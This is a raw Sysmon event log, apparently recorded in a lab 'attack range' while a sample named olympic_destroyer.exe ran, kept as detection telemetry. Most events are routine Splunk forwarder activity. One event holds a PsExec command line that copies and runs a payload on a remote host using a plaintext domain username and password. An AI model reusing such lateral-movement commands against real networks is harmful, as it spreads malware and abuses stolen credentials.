11:03:19.406{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.406{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.406{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.406{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.336{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.320{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.332{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.320{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1477-6216-9E06-000000003802}6844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000294650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.320{C8EA50B7-145C-6216-9606-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000218890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:19.191{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=952B35DEADFC24B85D6A8B9EC7092CA7,SHA256=18FCBF9080368EDCCC9479D69FB0EF87476803E4C38DC1FDEDE10C9809D7D426,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.273{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1477-6216-9D06-000000003802}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.273{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.272{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1477-6216-9D06-000000003802}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.271{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1477-6216-9D06-000000003802}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:19.270{C8EA50B7-1477-6216-9D06-000000003802}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.823{C8EA50B7-1478-6216-A106-000000003802}68526656C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1478-6216-A106-000000003802}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1478-6216-A106-000000003802}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1478-6216-A106-000000003802}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.528{C8EA50B7-1478-6216-A106-000000003802}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D34627FF6F4CA083F828E5F2A407662,SHA256=43BA1B87428D0B83B6C8F61FDF3FA6D4D7FF93AAE9096BEDEB6E1375D1B45DDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:20.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3696E44A6FB8002D68A90C06B00E7A1D,SHA256=D94B6979F384063EA802CAF36D06C64D77E9546AD065F5B5F68952EFD5198940,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:20.177{C8EA50B7-1477-6216-A006-000000003802}69084960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 